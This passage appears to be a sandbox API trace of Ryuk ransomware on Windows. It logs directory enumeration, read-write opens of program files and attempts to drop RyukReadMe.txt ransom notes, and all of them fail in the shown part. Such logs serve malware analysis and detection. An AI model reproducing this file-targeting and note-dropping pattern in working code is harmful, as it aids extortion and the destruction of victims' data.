hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.391] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.391] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.391] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.391] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.391] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.391] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc", dwFileAttributes=0x80) returned 0 [0133.391] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.391] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.392] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.392] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.392] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.392] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc", dwFileAttributes=0x80) returned 0 [0133.392] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.392] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.392] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.392] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.392] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.392] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.392] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll", dwFileAttributes=0x80) returned 0 [0133.393] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.393] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.393] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.393] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.393] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.393] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.393] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll", dwFileAttributes=0x80) returned 0 [0133.394] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.394] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.394] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.394] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.394] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.394] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.394] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.394] SetLastError (dwErrCode=0x0) [0133.394] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\ole db\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.394] GetLastError () returned 0x5 [0133.394] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.394] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.394] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.394] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.394] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0133.394] FindClose (in: hFindFile=0x3bd420 | out: hFindFile=0x3bd420) returned 1 [0133.394] SetLastError (dwErrCode=0x0) [0133.394] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.395] GetLastError () returned 0x5 [0133.395] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.395] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.395] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0133.395] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0133.395] SetLastError (dwErrCode=0x0) [0133.395] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.395] GetLastError () returned 0x5 [0133.395] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0133.395] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.395] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0133.395] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0133.395] SetLastError (dwErrCode=0x0) [0133.395] CreateFileW (lpFileName="C:\\Program Files\\RyukReadMe.txt" (normalized: "c:\\program files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.395] GetLastError () returned 0x5 [0133.395] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0133.395] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.395] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0133.396] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.396] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.396] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.396] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\audiodepthconverter.ax", dwFileAttributes=0x80) returned 0 [0133.397] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\audiodepthconverter.ax" (normalized: "c:\\program files\\dvd maker\\audiodepthconverter.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.397] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.397] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.397] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.397] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.397] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\bod_r.TTF", dwFileAttributes=0x80) returned 0 [0133.398] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\bod_r.TTF" (normalized: "c:\\program files\\dvd maker\\bod_r.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.398] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.398] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.398] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.398] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.398] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\directshowtap.ax", dwFileAttributes=0x80) returned 0 [0133.398] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\directshowtap.ax" (normalized: "c:\\program files\\dvd maker\\directshowtap.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.398] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.398] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.399] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.399] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.399] SetLastError (dwErrCode=0x0) [0133.399] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.399] GetLastError () returned 0x5 [0133.399] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.399] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.399] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\en-US\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3bd420 [0133.399] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.399] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.399] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.399] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.399] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0133.399] FindClose (in: hFindFile=0x3bd420 | out: hFindFile=0x3bd420) returned 1 [0133.399] SetLastError (dwErrCode=0x0) [0133.399] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\en-US\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.399] GetLastError () returned 0x5 [0133.399] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.400] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.400] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.400] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.400] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Eurosti.TTF", dwFileAttributes=0x80) returned 0 [0133.400] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Eurosti.TTF" (normalized: "c:\\program files\\dvd maker\\eurosti.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.400] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.400] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.400] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.400] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.400] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\fieldswitch.ax", dwFileAttributes=0x80) returned 0 [0133.401] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\fieldswitch.ax" (normalized: "c:\\program files\\dvd maker\\fieldswitch.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.401] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.401] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.401] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.401] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.401] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\offset.ax", dwFileAttributes=0x80) returned 0 [0133.402] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\offset.ax" (normalized: "c:\\program files\\dvd maker\\offset.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.402] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.402] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.402] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.402] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.402] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.402] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.402] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.402] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.402] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\rtstreamsink.ax", dwFileAttributes=0x80) returned 0 [0133.403] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\rtstreamsink.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsink.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.403] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.403] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.403] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.403] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.403] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\rtstreamsource.ax", dwFileAttributes=0x80) returned 0 [0133.404] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\rtstreamsource.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsource.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.404] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.404] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.404] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.404] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.404] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\SecretST.TTF", dwFileAttributes=0x80) returned 0 [0133.404] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\SecretST.TTF" (normalized: "c:\\program files\\dvd maker\\secretst.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.404] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.404] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.404] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.405] SetLastError (dwErrCode=0x0) [0133.405] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.405] GetLastError () returned 0x5 [0133.405] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.405] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.405] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3bd420 [0133.406] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.406] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.406] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.406] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\Common.fxh", dwFileAttributes=0x80) returned 0 [0133.407] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\Common.fxh" (normalized: "c:\\program files\\dvd maker\\shared\\common.fxh"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.407] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.407] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.407] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.407] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.407] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png", dwFileAttributes=0x80) returned 0 [0133.408] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.408] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.408] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.408] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.408] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.408] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png", dwFileAttributes=0x80) returned 0 [0133.408] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.409] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.409] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.409] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.409] SetLastError (dwErrCode=0x0) [0133.409] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.409] GetLastError () returned 0x5 [0133.409] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.409] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.409] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.411] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.411] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.411] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.411] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png", dwFileAttributes=0x80) returned 0 [0133.412] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.412] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.412] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.412] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.412] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.412] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.413] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.413] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.413] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.413] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.413] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.413] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png", dwFileAttributes=0x80) returned 0 [0133.415] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.415] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.415] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.415] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.415] 